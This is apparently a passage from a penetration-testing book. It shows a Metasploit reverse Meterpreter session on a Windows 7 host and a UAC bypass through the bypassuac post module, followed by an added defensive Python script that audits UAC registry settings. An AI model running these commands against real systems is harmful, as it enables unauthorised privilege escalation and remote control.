Meterpreter Scripting
In this example, we use the post exploitation modules, which can be
used to bypass UAC. We first start the multi/handler module with the -j
flag, which allows us to accept multiple Meterpreter shells. Notice in
this example that when we try to run the getsystem command, it fails
because it is being blocked by Windows UAC.
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:2310) at Thu June 09 08:02:45 -0500 2011
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > sysinfo
Computer: DAVE-DEV-PC
OS : Windows 7 (Build 7600).
Arch : x64 (Current Process is WOW64)
Language: en_US
meterpreter >
Notice that we can’t bridge over to a system-level account, because UAC
is blocking us. We need to get around UAC to obtain system-level privileges
and ultimately become an administrator so that we can further compromise
the machine. We press CTRL-Z to back out, keeping the session active. Then
we use the new format to run post modules and bypass the Windows UAC
functionality.
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options
Module options (post/windows/escalate/bypassuac):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     no        Listener IP address for the new session
   LPORT    4444             no        Listener port for the new session
   SESSION                   yes       The session to run this module on.
msf post(bypassuac) > set LHOST 172.16.32.128
LHOST => 172.16.32.128
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit
[*] Started reverse handler on 172.16.32.128:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
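
A defender-side audit of the UAC policy that stood between the session above and SYSTEM, as an added example that is not from the book: it parses `reg query` output for the Policies\System key and flags settings that let elevation happen without a prompt. The sample output is constructed, the value meanings follow Microsoft's documentation for ConsentPromptBehaviorAdmin, and treating the default value 5 as the setting the bypass depends on is this example's assumption.

```python
import re

# Constructed sample (not from the page): output of
#   reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    EnableLUA    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
"""

DWORD_RE = re.compile(
    r"^[ \t]+(\w+)[ \t]+REG_DWORD[ \t]+(0x[0-9a-fA-F]+)[ \t]*$", re.M)


def parse_reg_query(text):
    """Return {value_name: int} for each REG_DWORD line of reg query output."""
    return {name: int(raw, 16) for name, raw in DWORD_RE.findall(text)}


def audit_uac(values):
    """Classify the admin-approval policy; return (level, findings)."""
    lua = values.get("EnableLUA")
    admin = values.get("ConsentPromptBehaviorAdmin")
    if lua is None or admin is None:
        return "unknown", ["EnableLUA or ConsentPromptBehaviorAdmin missing"]
    if lua == 0:
        return "disabled", ["EnableLUA=0: UAC is switched off"]
    findings = []
    if admin == 0:
        level = "silent-elevation"
        findings.append("ConsentPromptBehaviorAdmin=0: elevates with no prompt")
    elif admin == 5:
        # Assumption of this example: 5 is the setting the bypass relies on.
        level = "auto-elevate-windows-binaries"
        findings.append("ConsentPromptBehaviorAdmin=5: only non-Windows "
                        "binaries prompt; set 2 to prompt for every elevation")
    else:
        level = "prompt-every-elevation"  # values 1-4 always prompt
    if admin in (3, 4, 5) and values.get("PromptOnSecureDesktop") != 1:
        findings.append("PromptOnSecureDesktop is not 1: the prompt appears "
                        "on the user's desktop, not the secure desktop")
    return level, findings


if __name__ == "__main__":
    level, findings = audit_uac(parse_reg_query(SAMPLE))
    print(level)
    for f in findings:
        print(" -", f)
```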